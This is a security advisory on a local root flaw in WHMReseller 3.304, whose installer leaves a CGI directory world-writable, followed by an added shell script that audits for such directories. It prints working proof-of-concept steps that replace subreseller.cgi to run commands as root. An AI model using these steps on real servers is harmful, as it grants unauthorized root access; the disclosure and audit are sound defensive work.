WHMReseller 3.304 - any local user could execute commands as root
DESCRIPTION
World-writable permissions on /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller allowed any local user to execute commands as root.
IMPACT
Local users could obtain full root access.
When WHMReseller 3.304 was installed, it changed the permissions of the whmreseller/ directory to 0777:
31802 chmod("./whmreseller", 0777) = 0
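Write permission on a directory controls renaming and creating its entries, whoever owns the files in it. As such, you can rename and then recreate any existing file in that directory.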
[user@host ~]$ cd /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller]$ mv subreseller.cgi subreseller.cgi.old
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller]$ cat > subreseller.cgi << EOF
#!/bin/sh
/usr/bin/id > /home/user/id.out
EOF
The next time a reseller accesses WHMReseller, your commands in the subreseller.cgi file you created will be executed as root:
[user@host ~]$ cat id.out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
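An audit for the condition described above, as an added example that is not part of the original advisory or the vendor's code: it lists directories that are world-writable with the sticky bit clear, both below a given path and among its parents. The function names and the sample tree built by demo() are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not vendor code): find directories whose entries any local
# user can rename or replace, i.e. world-writable with the sticky bit clear.

# List such directories at or below $1, with mode and owner via ls -ld.
audit_tree() {
    find "$1" -xdev -type d -perm -0002 ! -perm -1000 -exec ls -ld {} +
}

# Apply the same test to each parent of $1: a replaceable parent lets a
# user swap out the directory beneath it, even if that directory is 0755.
audit_ancestors() {
    p=$(dirname "$1")
    while :; do
        find "$p" -prune -type d -perm -0002 ! -perm -1000 -exec ls -ld {} +
        if [ "$p" = "/" ] || [ "$p" = "." ]; then break; fi
        p=$(dirname "$p")
    done
}

# Build a constructed sample tree (not a real cPanel install) and audit it.
demo() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/cgi/whmreseller" "$t/cgi/other" "$t/cgi/spool"
    chmod 0777 "$t/cgi/whmreseller"   # the mode seen in the chmod() trace
    chmod 0755 "$t/cgi/other"         # not writable by others
    chmod 1777 "$t/cgi/spool"         # sticky: only owners may rename
    audit_tree "$t/cgi"
    rm -rf "$t"
}

# Usage: sh audit.sh /usr/local/cpanel/whostmgr/docroot/cgi
if [ "$#" -gt 0 ]; then
    audit_tree "$1"
    audit_ancestors "$1"
else
    demo
fi
```

Any line of output is a directory where an unprivileged account can swap a file that a more privileged process later runs.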